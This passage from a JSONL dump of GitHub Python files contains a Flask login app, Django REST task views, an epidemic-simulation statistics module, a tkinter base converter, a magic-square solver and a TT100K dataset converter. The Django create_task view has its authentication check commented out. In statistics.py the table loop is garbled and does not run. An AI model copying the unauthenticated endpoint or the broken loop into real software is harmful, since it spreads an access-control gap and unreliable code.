name=current_user.name)\n\n\n@app.route('/aircadia')\ndef aaa():\n return \"Hello, AirCADia!\"\n\n\n@app.route('/signup')\ndef signup():\n return render_template('signup.html')\n\n@app.route('/signup', methods=['POST'])\ndef signup_post():\n # code to validate and add user to database goes here\n email = request.form.get('email')\n username = request.form.get('email')\n name = request.form.get('name')\n password = request.form.get('password')\n\n user = User.query.filter_by(email=email).first() # if this returns a user, then the email already exists in database\n\n if user: # if a user is found, we want to redirect back to signup page so user can try again\n flash('Email address already exists')\n return redirect(url_for('signup'))\n\n # create a new user with the form data. Hash the password so the plaintext version isn't saved.\n new_user = User(name=name, email=email, username=username, password=generate_password_hash(password, method='sha256'))\n\n # add the new user to the database\n db.session.add(new_user)\n db.session.commit()\n return redirect(url_for('login'))\n\n\n@app.route('/login')\ndef login():\n return render_template('login.html')\n\n@app.route('/login', methods=['POST'])\ndef login_post():\n # login code goes here\n email = request.form.get('email')\n password = request.form.get('password')\n remember = True if request.form.get('remember') else False\n\n user = User.query.filter_by(email=email).first()\n\n # check if the user actually exists\n # take the user-supplied password, hash it, and compare it to the hashed password in the database\n if not user or not check_password_hash(user.password, password):\n flash('Please check your login details and try again.')\n return redirect(url_for('login')) # if the user doesn't exist or password is wrong, reload the page\n\n # if the above check passes, then we know the user has the right credentials\n login_user(user, remember=remember)\n return redirect(url_for('profile'))\n\n\n\n\n\n@app.route('/logout')\ndef logout():\n logout_user()\n return 'Logout'\n\n\n\n\n\n@app.route('/get-projects', methods=[\"GET\"])\ndef get_projects():\n projectsJson = []\n # projects\n projects = Project.query.all()\n for project in projects:\n projectJson = {\n \"name\": project.name,\n \"end_point\": project.end_point\n }\n projectsJson.append(projectJson)\n res = make_response(jsonify(projectsJson), 200)\n return res\n\n\n# Table for storing users\nclass User(UserMixin, db.Model):\n __tablename__ = 'Users'\n id = db.Column(\"ID\", db.Integer, primary_key = True)\n name = db.Column(\"Name\", db.String(50))\n email = db.Column(\"Email\", db.String(50), unique=True)\n #location = db.Column(db.String(50))\n #date_created = db.Column(db.DateTime, dafault = datetime.now)\n username = db.Column(\"Username\", db.String(50), unique=True)\n password = db.Column(\"Password\", db.String(50))\n projects = db.relationship(\"Project\", secondary=\"UsersProjects\")\n\n \n\n\n\n# Table for storing projects\nclass Project(db.Model):\n __tablename__ = 'Projects'\n id = db.Column(\"ID\", db.Integer, primary_key = True)\n name = db.Column(\"Name\", db.String(50))\n end_point = db.Column(\"EndPoint\", db.String(50))\n #value = db.Column(db.String(50))\n #date_created = db.Column(db.DateTime, dafault = datetime.now)\n\n\n# Table for storing users-projects\nclass UserProject(db.Model):\n __tablename__ = 'UsersProjects'\n id = db.Column(\"ID\", db.Integer, primary_key=True)\n user_id = db.Column(\"UserID\", db.Integer, db.ForeignKey('Users.ID'))\n project_id = db.Column(\"ProjectID\", db.Integer, db.ForeignKey('Projects.ID'))\n user = db.relationship(User, backref=db.backref(\"UsersProjects\", cascade=\"all, delete-orphan\"))\n project = db.relationship(Project, backref=db.backref(\"UsersProjects\", cascade=\"all, delete-orphan\"))\n\n\n\n\n\n\n#Events\n@socketio.on('message')\ndef handle_message(msg):\n print('get message:'+ msg)\n send(msg, broadcast=True)\n\n\n@socketio.on('create_data')\ndef handle_create_data(json):\n print('received json: ' + str(json))\n emit('create_data', json, broadcast=True)\n\n@socketio.on('create_model')\ndef handle_create_model(json):\n print('received json: ' + str(json))\n emit('create_model', json, broadcast=True)\n\n\n@socketio.on('create_workflow')\ndef handle_create_workflow(json):\n print('received json: ' + str(json))\n emit('create_workflow', json, broadcast=True)\n\n\n\nif __name__ == '__main__':\n socketio.run(app, debug=True, port=3001)","repo_name":"Atif-Aerospace/AirCADiaNebosDatabase","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"395190592","text":"from rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom .models import Task\nfrom .serializers import TaskSerializer\nfrom django.shortcuts import get_object_or_404\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef get_task_list(request):\n tasks = Task.objects.filter(owner=request.user)\n serializer = TaskSerializer(tasks, many=True)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef get_task_detail(request, id):\n task = get_object_or_404(Task, id=id, owner=request.user)\n serializer = TaskSerializer(task)\n return Response(serializer.data)\n\n@api_view(['POST'])\n# @permission_classes([IsAuthenticated])\ndef create_task(request):\n serializer = TaskSerializer(data=request.data)\n if serializer.is_valid():\n serializer.validated_data['owner'] = request.user\n serializer.validated_data['completed'] = False\n serializer.save()\n return Response(serializer.data, status=201)\n return Response(serializer.errors, status=400)\n\n@api_view(['PATCH'])\n@permission_classes([IsAuthenticated])\ndef edit_task(request, id):\n task = get_object_or_404(Task, id=id, owner=request.user)\n serializer = TaskSerializer(task, data=request.data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=400)\n\n@api_view(['DELETE'])\n@permission_classes([IsAuthenticated])\ndef delete_task(request, id):\n task = get_object_or_404(Task, id=id, owner=request.user)\n task.delete()\n return Response(status=204)\n\n@api_view(['POST'])\n@permission_classes([IsAuthenticated])\ndef execute_task(request, id):\n task = get_object_or_404(Task, id=id, owner=request.user)\n task.completed = True\n task.save()\n return Response({\"message\": \"Task marked as completed\"})\n","repo_name":"adaltair/decodeproject","sub_path":"src/todo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"13670577312","text":"\"\"\"\n03/08/2020\n\nGroup 4: Majed Almazrouei, Justin Becker, Dylan Conway, Kyle Diodati, Nicholas Fay\n\nThis module is in charge of collecting and producing statistics on the simulation and the data it collected from\nthe contagions influence on the population.\n\"\"\"\n\nimport os\nimport sys\n\nimport lib.city\nimport lib.person\nimport lib.vessel\n\n\nclass statistics:\n\n def __init__(self):\n \"\"\"\n self, None -> None\n This function has the purpose of initializing the statistics module. \n This module keeps track of all statistical calculations/displays that the program makes.\n \"\"\"\n self.cities = list() #list of all the cities in the simulation\n self.activevessels = list() # list of flights that are ready to leave\n self.inactivevessels = list() # list of flights not ready to leave\n #number of dead, immune, infected and healthy individuals\n self.dead = 0\n self.immune = 0\n self.inf = 0\n self.healthy = 0\n\n self.Re = 100\n self.totalPop = 0\n\n def add_vessels(self, newVessels):\n \"\"\"\n self, list(new vessels) -> None\n This function adds new vessels to the active planes we can track.\n \"\"\"\n self.activevessels += newVessels\n return\n\n def add_city(self, newcity):\n \"\"\"\n self, city (city object) -> None\n This function adds cities to the statistics cities list.\n \"\"\"\n self.cities.append(newcity)\n # Add to the total population.\n self.totalPop += len(newcity.people)\n return \n\n def curr_contagion_info(self, hour, run_time):\n \"\"\"\n self, int (hour), int (run time) -> None\n This function has a purpose of printing the current information of the contagions impact \n on the population for that specific day: hour. This function is solely used for printing to console\n to visually show the trends in the contagion contamination.\n \"\"\"\n\n #print header day and hour values\n formated_completon_perc = str((hour/run_time) * 100)\n formated_completon_perc = formated_completon_perc[:5]\n print(\"\\033[0;0H\", end=\"\")\n print(\"\\rSimulation Completion at {}%\\n\".format(formated_completon_perc), end=\"\\n\")\n print(\"\\r\\33[1mDay {}\\tHour {}:\".format(int(hour/24), hour), end=\"\\n\")\n #iterate through all the cities and get the total counts for contagion information\n for location in self.cities:\n inf = location.inf_count\n hlth = location.healthy_count\n immu = location.immune_count\n dead = location.dead_count\n #print the information to the console\n print(\"\\r \\033[K\", end=\"\") # Fixes healthy having character duplicates\n print(\"\\r \\33[1m {}\\33[0m:\\t\\t\\33[32m{} Healthy\\33[0m\\t {} Immune\\t\\33[93m{} Infected \\33[0m\\t\\33[31m {} Dead \\33[0m\".format(location.name, hlth, immu, inf, dead), end=\"\\n\")\n \n print(\"\\r\\nEffective Reproduction Number: {}\".format(self.Re), end=\"\\n\")\n\n print(\"\\r\\nPress CTRL^C to exit the simulation early.\")\n return \n \n def get_total_counts(self):\n \"\"\"\n self, None -> None\n This function is responsible for getting the total amount of the given attribute (inf, dead etc) people \n from each city to report statistics.\n \"\"\"\n for city in self.cities: #iterate through all the cities\n self.healthy += city.healthy_count\n self.dead += city.dead_count\n self.immune += city.immune_count\n self.inf += city.inf_count\n \n # Get counts for people still in flight when the program finishes.\n for flight in self.activevessels:\n for person in flight.people:\n if person.immune:\n self.immune += 1\n elif person.dead:\n self.dead += 1\n elif person.infected:\n self.inf += 1\n else:\n self.healthy += 1\n return\n\n def get_percentage(self, count, init_population):\n \"\"\"\n self, int (count of people), int (healthy person count) -> float\n This function is in charge of calculating the percentage of individuals that \n die, get infected or become immune compared to the overall population.\n \"\"\"\n #try to calculate percentage\n try:\n return ((count/init_population) * 100)\n except ZeroDivisionError:\n #if there is a division by zero error for some reason\n return 0\n\n def print_time_series_table(self, days, immune, infected, dead):\n \"\"\"\n self, list, list, list, list -> None\n This function is in charge of printing a table that shows all the time series data\n that has been collected. This will be exececuted at the end of the program.\n \"\"\"\n #dict for labels and rows\n table = [days, infected, immune, dead]\n #list of all header labels\n headers = [\"Days\", \"Infected\", \"Immune\", \"Dead\"]\n for item in headers:\n print(\"\\33[1m{:>10}\\33[0m\".format(item).strip(\"\\n\"), end=\"\")\n print(\"\")\n #iterate through table keys\n i = 0\n while(i10}\".format(row[i]).strip(\"\\n\"), end=\"\")\n #print a new line for the next day\n print(\"\")\n i += 1\n return\n\n def average_stats(self, days, attribute):\n \"\"\"\n self, int (days), int (attribute) -> float\n This function has a purpose of determining the average number of\n individuals that die, immune or are infected each day. \n \"\"\"\n return attribute/days\n\n def print_stats(self, days, initial_pop):\n \"\"\"\n self, int (days the simulation ran for), int (initial population) -> None\n This function has the sole function of printing all final statistics after\n the execution of the main program.\n \"\"\"\n #get the total counts of infected, dead, immune and healthy individuals\n self.get_total_counts()\n #get the percentage of those dead, immune and infected\n dead_perc = self.get_percentage(self.dead, initial_pop)\n immune_perc = self.get_percentage(self.immune, initial_pop)\n inf_perc = self.get_percentage(self.inf, initial_pop)\n healthy_perc = self.get_percentage(self.healthy, initial_pop)\n average_deaths = self.average_stats(days,self.dead)\n average_infected = self.average_stats(days, self.inf)\n average_immune = self.average_stats(days, self.immune)\n #print the total counts after the amount of time the simulation has run\n print(\"\\n\\nAfter {} days, these are the results of the contagions impact on the population with {} individuals.\".format(days, initial_pop))\n print(\"\\33[1mTotal Counts ---->\\33[0m\\33[32m Healthy: {},\\33[0m\\33[93m Infected: {},\\33[0m \\33[31mDead: {},\\33[0m Immune: {}\".format(self.healthy, self.inf, self.dead, self.immune))\n print(\"Each day on average: \\33[93m{} people are infected\\33[0m, \\33[31m{} die\\33[0m and {} become immune.\".format(average_infected, average_deaths, average_immune))\n #print the total amount of healthy people, dead, infected and immune\n print(\"Out of the {} people in the total population.\".format(initial_pop))\n print(\"{}% are \\33[31mdead.\\33[0m\".format(dead_perc))\n print(\"{}% are immune.\".format(immune_perc))\n print(\"{}% were \\33[93minfected.\\33[0m\".format(inf_perc))\n print(\"{}% are still \\33[32mhealthy.\\33[0m\".format(healthy_perc))\n return\n","repo_name":"kdiodati/Epidemic-Simulator","sub_path":"lib/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":7762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"27048950868","text":"\n# Write Python GUI program to accept a decimal number and convert and display it to binary, octal and hexadecimal number.\nfrom tkinter import *\ndef calculate():\n res=int(e1.get())\n label_text.set(bin(res))\n label_text1.set(oct(res))\n label_text2.set(hex(res))\n \nwindow=Tk()\nlabel_text=StringVar()\nlabel_text1=StringVar()\nlabel_text2=StringVar()\nLabel(window,text=\"Enter Decimal Number: \").grid(row=0)\n\n\nLabel(window,text=\"Binary: \").grid(row=3)\nresult=Label(window,text=\"\",textvariable=label_text).grid(row=3,column=1)\n\nLabel(window,text=\"Octal\").grid(row=4)\nresult=Label(window,text=\"\",textvariable=label_text1).grid(row=4,column=1)\n\nLabel(window,text=\"Hexadecimal: \").grid(row=5)\nresult=Label(window,text=\"\",textvariable=label_text2).grid(row=5,column=1)\ne1=Entry(window)\ne1.grid(row=0,column=1)\nb=Button(window,text=\"Calculate\",command=calculate)\nb.grid(row=0,column=6,columnspan=2,rowspan=2,padx=5,pady=5)\nmainloop()\n\n","repo_name":"khankabi/TY-BCA_Samir","sub_path":"PRACTICAL SLIPS SOLUTION/Slip 27/python/Q2.py","file_name":"Q2.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"10448113425","text":"from itertools import combinations\nfrom random import shuffle\n\nfrom simpleai.search import SearchProblem, hill_climbing\n\nfrom utils import print_grid\n\n\nSQUARE_SIZE = 10\nMAX_NUMBER = SQUARE_SIZE ** 2\n\nTARGET_TOTAL = sum(range(1, MAX_NUMBER+1)) / SQUARE_SIZE\n\n\ndef find(element, state):\n for row_i, row in enumerate(state):\n for column_i, this_element in enumerate(row):\n if element == this_element:\n return row_i, column_i\n\n\nclass MagicSquareProblem(SearchProblem):\n def actions(self, state):\n return list(combinations(range(1, MAX_NUMBER +1), 2))\n\n def result(self, state, action):\n state = [list(row) for row in state]\n number_a, number_b = action\n\n a_row, a_column = find(number_a, state)\n b_row, b_column = find(number_b, state)\n\n state[a_row][a_column] = number_b\n state[b_row][b_column] = number_a\n\n return tuple(tuple(row) for row in state)\n\n def value(self, state):\n totals = []\n for row in state:\n totals.append(sum(row))\n\n for column in zip(*state):\n totals.append(sum(column))\n\n return totals.count(TARGET_TOTAL)\n\n def generate_random_state(self):\n numbers = list(range(1, MAX_NUMBER + 1))\n shuffle(numbers)\n\n state = []\n for row_index in range(SQUARE_SIZE):\n from_index = row_index * SQUARE_SIZE\n to_index = from_index + SQUARE_SIZE\n state.append(tuple(numbers[from_index:to_index]))\n\n return tuple(state)\n\n def print_state(self, state):\n elements = {\n str(element): [(row_i, column_i)]\n for row_i, row in enumerate(state)\n for column_i, element in enumerate(row)\n }\n\n print_grid(SQUARE_SIZE, SQUARE_SIZE, elements)\n\n\nif __name__ == \"__main__\":\n expected_value = SQUARE_SIZE * 2\n iterations = 0\n while True:\n iterations += 1\n random_state = MagicSquareProblem().generate_random_state()\n problem = MagicSquareProblem(random_state)\n result = hill_climbing(problem, 1000)\n if result.value == expected_value:\n print(\"solution found! Iterations:\", iterations)\n break\n if iterations % 10 == 0:\n print(f\"{iterations} iterations and the solution hasn't been found yet :(\")\n\n\n problem.print_state(result.state)\n print(\"value:\", problem.value(result.state))\n","repo_name":"sofide/ai-practices","sub_path":"magic_squares.py","file_name":"magic_squares.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"12089360442","text":"import os\nimport json\nfrom random import random\nimport cv2\nimport shutil\nimport json\nimport xml.dom.minidom\nfrom tqdm import tqdm\nimport argparse\n\n\n# from jinxSkills.jinx_opencv.datasets_transform.dataset_transform import DataSets_transform\n\n\nclass TT100K2COCO:\n def __init__(self):\n self.original_datasets = 'tt100k'\n self.to_datasets = 'coco'\n\n def class_statistics(self):\n # os.makedirs('annotations', exist_ok=True)\n # 存放数据的父路径\n parent_path = 'E:/dataset/tt100k_2021'\n\n # 读TT100K原始数据集标注文件\n with open(os.path.join(parent_path, 'annotations_all.json')) as origin_json:\n origin_dict = json.load(origin_json)\n classes = origin_dict['types']\n # 建立统计每个类别包含的图片的字典\n sta = {}\n for i in classes:\n sta[i] = []\n\n images_dic = origin_dict['imgs']\n\n # 记录所有保留的图片\n saved_images = []\n # 遍历TT100K的imgs\n for image_id in images_dic:\n image_element = images_dic[image_id]\n image_path = image_element['path']\n\n # 添加图像的信息到dataset中\n image_path = image_path.split('/')[-1]\n obj_list = image_element['objects']\n\n # 遍历每张图片的标注信息\n for anno_dic in obj_list:\n label_key = anno_dic['category']\n # 防止一个图片多次加入一个标签类别\n if image_path not in sta[label_key]:\n sta[label_key].append(image_path)\n\n # 只保留包含图片数超过100的类别(重新划分,阈值100可根据需求修改)\n result = {k: v for k, v in sta.items() if len(v) >= 100}\n\n for i in result:\n print(\"the type of {} includes {} images\".format(i, len(result[i])))\n saved_images.extend(result[i])\n\n saved_images = list(set(saved_images))\n print(\"total types is {}\".format(len(result)))\n\n type_list = list(result.keys())\n result = {\"type\": type_list, \"details\": result, \"images\": saved_images}\n print(type_list)\n # 保存结果\n json_name = os.path.join(parent_path, 'statistics.json')\n with open(json_name, 'w', encoding=\"utf-8\") as f:\n json.dump(result, f, ensure_ascii=False, indent=1)\n\n def original_datasets2object_datasets(self):\n # os.makedirs('dataset/annotations', exist_ok=True)\n # 存放数据的父路径\n parent_path = 'E:/dataset/tt100k_2021/data'\n\n # 读TT100K原始数据集标注文件\n with open(os.path.join(parent_path, 'annotations.json')) as origin_json:\n origin_dict = json.load(origin_json)\n\n with open(os.path.join(parent_path, 'statistics.json')) as select_json:\n select_dict = json.load(select_json)\n classes = select_dict['type']\n\n train_dataset = {'info': {}, 'licenses': [], 'categories': [], 'images': [], 'annotations': []}\n val_dataset = {'info': {}, 'licenses': [], 'categories': [], 'images': [], 'annotations': []}\n test_dataset = {'info': {}, 'licenses': [], 'categories': [], 'images': [], 'annotations': []}\n label = {}\n\n info = {\n \"year\": 2021, # 年份\n \"version\": '1.0', # 版本\n \"description\": \"TT100k_to_coco\", # 数据集描述\n \"contributor\": \"Tecent&Tsinghua\", # 提供者\n \"url\": 'https://cg.cs.tsinghua.edu.cn/traffic-sign/', # 下载地址\n \"date_created\": 2021 - 1 - 15\n }\n licenses = {\n \"id\": 1,\n \"name\": \"null\",\n \"url\": \"null\",\n }\n\n train_dataset['info'] = info\n val_dataset['info'] = info\n test_dataset['info'] = info\n train_dataset['licenses'] = licenses\n val_dataset['licenses'] = licenses\n test_dataset['licenses'] = licenses\n\n # 建立类别和id的关系\n for i, cls in enumerate(classes):\n train_dataset['categories'].append({'id': i, 'name': cls, 'supercategory': 'traffic_sign'})\n val_dataset['categories'].append({'id': i, 'name': cls, 'supercategory': 'traffic_sign'})\n test_dataset['categories'].append({'id': i, 'name': cls, 'supercategory': 'traffic_sign'})\n label[cls] = i\n\n images_dic = origin_dict['imgs']\n\n obj_id = 1\n\n # TT100K的annotation转换成coco的\n for image_id in images_dic:\n image_element = images_dic[image_id]\n image_path = image_element['path']\n\n # 用opencv读取图片,得到图像的宽和高\n im = cv2.imread(os.path.join(parent_path, image_path))\n H, W, _ = im.shape\n\n # 切换dataset的引用对象,从而划分数据集\n if 'train' in image_path:\n dataset = train_dataset\n elif 'test' in image_path:\n dataset = val_dataset\n else:\n dataset = test_dataset\n\n # 添加图像的信息到dataset中\n image_path = image_path.split('/')[-1]\n dataset['images'].append({'file_name': image_path,\n 'id': image_id,\n 'width': W,\n 'height': H})\n obj_list = image_element['objects']\n\n for anno_dic in obj_list:\n x = anno_dic['bbox']['xmin']\n y = anno_dic['bbox']['ymin']\n width = anno_dic['bbox']['xmax'] - anno_dic['bbox']['xmin']\n height = anno_dic['bbox']['ymax'] - anno_dic['bbox']['ymin']\n label_key = anno_dic['category']\n\n dataset['annotations'].append({\n 'area': width * height,\n 'bbox': [x, y, width, height],\n 'category_id': label[label_key],\n 'id': obj_id,\n 'image_id': image_id,\n 'iscrowd': 0,\n # mask, 矩形是从左上角点按顺时针的四个顶点\n 'segmentation': [[x, y, x + width, y, x + width, y + height, x, y + height]]\n })\n # 每个标注的对象id唯一\n obj_id += 1\n\n # 保存结果\n for phase in ['train', 'val', 'test']:\n json_name = os.path.join(parent_path, 'annotations/{}.json'.format(phase))\n with open(json_name, 'w', encoding=\"utf-8\") as f:\n if phase == 'train':\n json.dump(train_dataset, f, ensure_ascii=False, indent=1)\n if phase == 'val':\n json.dump(val_dataset, f, ensure_ascii=False, indent=1)\n if phase == 'test':\n json.dump(test_dataset, f, ensure_ascii=False, indent=1)\n\n def original_datasets2object_datasets_re(self):\n '''\n 重新划分数据集\n :return:\n '''\n # os.makedirs('annotations2', exist_ok=True)\n # 存放数据的父路径\n parent_path = 'E:/dataset/tt100k_2021'\n\n # 读TT100K原始数据集标注文件\n with open(os.path.join(parent_path, 'annotations.json')) as origin_json:\n origin_dict = json.load(origin_json)\n\n with open(os.path.join(parent_path, 'statistics.json')) as select_json:\n select_dict = json.load(select_json)\n classes = select_dict['type']\n\n train_dataset = {'info': {}, 'licenses': [], 'categories': [], 'images': [], 'annotations': []}\n val_dataset = {'info': {}, 'licenses': [], 'categories': [], 'images': [], 'annotations': []}\n test_dataset = {'info': {}, 'licenses': [], 'categories': [], 'images': [], 'annotations': []}\n label = {} # 记录每个标志类别的id\n count = {} # 记录每个类别的图片数\n owntype_sum = {}\n\n info = {\n \"year\": 2021, # 年份\n \"version\": '1.0', # 版本\n \"description\": \"TT100k_to_coco\", # 数据集描述\n \"contributor\": \"Tecent&Tsinghua\", # 提供者\n \"url\": 'https://cg.cs.tsinghua.edu.cn/traffic-sign/', # 下载地址\n \"date_created\": 2021 - 1 - 15\n }\n licenses = {\n \"id\": 1,\n \"name\": \"null\",\n \"url\": \"null\",\n }\n\n train_dataset['info'] = info\n val_dataset['info'] = info\n test_dataset['info'] = info\n train_dataset['licenses'] = licenses\n val_dataset['licenses'] = licenses\n test_dataset['licenses'] = licenses\n\n # 建立类别和id的关系\n for i, cls in enumerate(classes):\n train_dataset['categories'].append({'id': i, 'name': cls, 'supercategory': 'traffic_sign'})\n val_dataset['categories'].append({'id': i, 'name': cls, 'supercategory': 'traffic_sign'})\n test_dataset['categories'].append({'id': i, 'name': cls, 'supercategory': 'traffic_sign'})\n label[cls] = i\n count[cls] = 0\n owntype_sum[cls] = 0\n\n images_dic = origin_dict['imgs']\n\n obj_id = 1\n\n # 计算出每个类别共‘包含’的图片数\n for image_id in images_dic:\n\n image_element = images_dic[image_id]\n image_path = image_element['path']\n image_name = image_path.split('/')[-1]\n # 在所选的类别图片中\n if image_name not in select_dict['images']:\n continue\n\n # 处理TT100K中的标注信息\n obj_list = image_element['objects']\n # 记录图片中包含最多的实例所属的type\n includes_type = {}\n for anno_dic in obj_list:\n if anno_dic[\"category\"] not in select_dict[\"type\"]:\n continue\n # print(anno_dic[\"category\"])\n if anno_dic[\"category\"] in includes_type:\n includes_type[anno_dic[\"category\"]] += 1\n else:\n includes_type[anno_dic[\"category\"]] = 1\n # print(includes_type)\n own_type = max(includes_type, key=includes_type.get)\n owntype_sum[own_type] += 1\n\n # TT100K的annotation转换成coco的\n for image_id in images_dic:\n\n image_element = images_dic[image_id]\n image_path = image_element['path']\n image_name = image_path.split('/')[-1]\n # 在所选的类别图片中\n if image_name not in select_dict['images']:\n continue\n print(\"dealing with {} image\".format(image_path))\n # shutil.copy(os.path.join(parent_path,image_path),os.path.join(parent_path,\"dataset/JPEGImages\"))\n\n # 处理TT100K中的标注信息\n obj_list = image_element['objects']\n # 记录图片中包含最多的实例所属的type\n includes_type = {}\n for anno_dic in obj_list:\n if anno_dic[\"category\"] not in select_dict[\"type\"]:\n continue\n # print(anno_dic[\"category\"])\n if anno_dic[\"category\"] in includes_type:\n includes_type[anno_dic[\"category\"]] += 1\n else:\n includes_type[anno_dic[\"category\"]] = 1\n # print(includes_type)\n own_type = max(includes_type, key=includes_type.get)\n count[own_type] += 1\n num_rate = count[own_type] / owntype_sum[own_type]\n\n # 切换dataset的引用对象,从而划分数据集根据每个类别类别的总数量按7:2:1分为了train_set,val_set,test_set。\n # 其中每个图片所属类别根据该图片包含的类别的数量决定(归属为含有类别最多的类别)\n if num_rate < 0.7:\n dataset = train_dataset\n elif num_rate < 0.9:\n dataset = val_dataset\n else:\n print(\"dataset=test_dataset\")\n dataset = test_dataset\n\n for anno_dic in obj_list:\n if anno_dic[\"category\"] not in select_dict[\"type\"]:\n continue\n x = anno_dic['bbox']['xmin']\n y = anno_dic['bbox']['ymin']\n width = anno_dic['bbox']['xmax'] - anno_dic['bbox']['xmin']\n height = anno_dic['bbox']['ymax'] - anno_dic['bbox']['ymin']\n label_key = anno_dic['category']\n\n dataset['annotations'].append({\n 'area': width * height,\n 'bbox': [x, y, width, height],\n 'category_id': label[label_key],\n 'id': obj_id,\n 'image_id': image_id,\n 'iscrowd': 0,\n # mask, 矩形是从左上角点按顺时针的四个顶点\n 'segmentation': [[x, y, x + width, y, x + width, y + height, x, y + height]]\n })\n # 每个标注的对象id唯一\n obj_id += 1\n\n # 用opencv读取图片,得到图像的宽和高\n im = cv2.imread(os.path.join(parent_path, image_path))\n # print(image_path)\n H, W, _ = im.shape\n # 添加图像的信息到dataset中\n dataset['images'].append({'file_name': image_name,\n 'id': image_id,\n 'width': W,\n 'height': H})\n\n # 保存结果\n for phase in ['train', 'val', 'test']:\n json_name = os.path.join(parent_path, 'data/dataset/annotations/{}.json'.format(phase))\n with open(json_name, 'w', encoding=\"utf-8\") as f:\n if phase == 'train':\n json.dump(train_dataset, f, ensure_ascii=False, indent=1)\n if phase == 'val':\n json.dump(val_dataset, f, ensure_ascii=False, indent=1)\n if phase == 'test':\n json.dump(test_dataset, f, ensure_ascii=False, indent=1)\n\n def json2xml(self):\n img_path = 'E:/dataset/tt100k_2021/data/train/' # train图片路径\n annos = json.loads(open(\"E:/dataset/tt100k_2021/data/annotations.json\").read())\n xml_path = 'E:/dataset/tt100k_2021data/xml_train/' # xml保存路径\n\n for line in open(img_path + \"ids.txt\"):\n img_name = line.replace('\\n', '')\n img_file = img_name + '.jpg'\n img = cv2.imread(img_path + img_file)\n sp = img.shape\n img_height = str(sp[0]) # height(rows) of image\n img_width = str(sp[1])\n\n doc = xml.dom.minidom.Document()\n # creat a root node which name is annotation\n annotation = doc.createElement('annotation')\n # add the root node to the dom document object\n doc.appendChild(annotation)\n\n # add the folder subnode\n folder = doc.createElement('folder')\n folder_text = doc.createTextNode('JPEGImages')\n folder.appendChild(folder_text)\n annotation.appendChild(folder)\n\n # add the filename subnode\n filename = doc.createElement('filename')\n filename_text = doc.createTextNode(img_file)\n filename.appendChild(filename_text)\n annotation.appendChild(filename)\n\n # add the path subnode\n path = doc.createElement('path')\n path_text = doc.createTextNode(\n img_path + img_file)\n path.appendChild(path_text)\n annotation.appendChild(path)\n\n # add the source subnode\n source = doc.createElement('source')\n database = doc.createElement('database')\n database_text = doc.createTextNode('Unknown')\n source.appendChild(database)\n database.appendChild(database_text)\n annotation.appendChild(source)\n\n # add the size subnode\n size = doc.createElement('size')\n width = doc.createElement('width')\n width_text = doc.createTextNode(img_width)\n height = doc.createElement('height')\n height_text = doc.createTextNode(img_height)\n depth = doc.createElement('depth')\n depth_text = doc.createTextNode('3')\n size.appendChild(width)\n width.appendChild(width_text)\n size.appendChild(height)\n height.appendChild(height_text)\n size.appendChild(depth)\n depth.appendChild(depth_text)\n annotation.appendChild(size)\n\n segmented = doc.createElement('segmented')\n segmented_text = doc.createTextNode('0')\n segmented.appendChild(segmented_text)\n annotation.appendChild(segmented)\n\n img_objects = annos[\"imgs\"][img_name]['objects']\n for i in range(0, len(img_objects)):\n obj_category = annos[\"imgs\"][img_name]['objects'][i]['category']\n obj_bbox = annos[\"imgs\"][img_name]['objects'][i]['bbox']\n bbox_ymin = int(annos[\"imgs\"][img_name]['objects'][i]['bbox']['ymin'])\n bbox_xmin = int(annos[\"imgs\"][img_name]['objects'][i]['bbox']['xmin'])\n bbox_ymax = int(annos[\"imgs\"][img_name]['objects'][i]['bbox']['ymax'])\n bbox_xmax = int(annos[\"imgs\"][img_name]['objects'][i]['bbox']['xmax'])\n print(obj_category, bbox_ymin, bbox_xmin, bbox_ymax, bbox_xmax)\n\n object = doc.createElement('object')\n name = doc.createElement('name')\n name_text = doc.createTextNode(obj_category)\n difficult = doc.createElement('difficult')\n difficult_text = doc.createTextNode('0')\n pose = doc.createElement('pose')\n pose_text = doc.createTextNode('Unspecified')\n truncated = doc.createElement('truncated')\n truncated_text = doc.createTextNode('0')\n bndbox = doc.createElement('bndbox')\n xmin = doc.createElement('xmin')\n xmin_text = doc.createTextNode(str(bbox_xmin))\n ymin = doc.createElement('ymin')\n ymin_text = doc.createTextNode(str(bbox_ymin))\n xmax = doc.createElement('xmax')\n xmax_text = doc.createTextNode(str(bbox_xmax))\n ymax = doc.createElement('ymax')\n ymax_text = doc.createTextNode(str(bbox_ymax))\n object.appendChild(name)\n name.appendChild(name_text)\n object.appendChild(pose)\n pose.appendChild(pose_text)\n object.appendChild(truncated)\n truncated.appendChild(truncated_text)\n object.appendChild(difficult)\n difficult.appendChild(difficult_text)\n object.appendChild(bndbox)\n bndbox.appendChild(xmin)\n xmin.appendChild(xmin_text)\n bndbox.appendChild(ymin)\n ymin.appendChild(ymin_text)\n bndbox.appendChild(xmax)\n xmax.appendChild(xmax_text)\n bndbox.appendChild(ymax)\n ymax.appendChild(ymax_text)\n annotation.appendChild(object)\n fp = open(xml_path + '%s.xml' % img_name, 'w+')\n doc.writexml(fp, indent='\\t', addindent='\\t', newl='\\n', encoding='utf-8')\n # print(annos[\"imgs\"][img_name]['objects'])\n fp.close()\n\n def coco_json2yolo_txt(self, class_json):\n # COCO 格式的数据集转化为 YOLO 格式的数据集\n # --json_path 输入的json文件路径\n # --save_path 保存的文件夹名字,默认为当前目录下的labels。\n\n\n parser = argparse.ArgumentParser()\n # 这里根��自己的json文件位置,换成自己的就行\n parser.add_argument('--json_path',\n 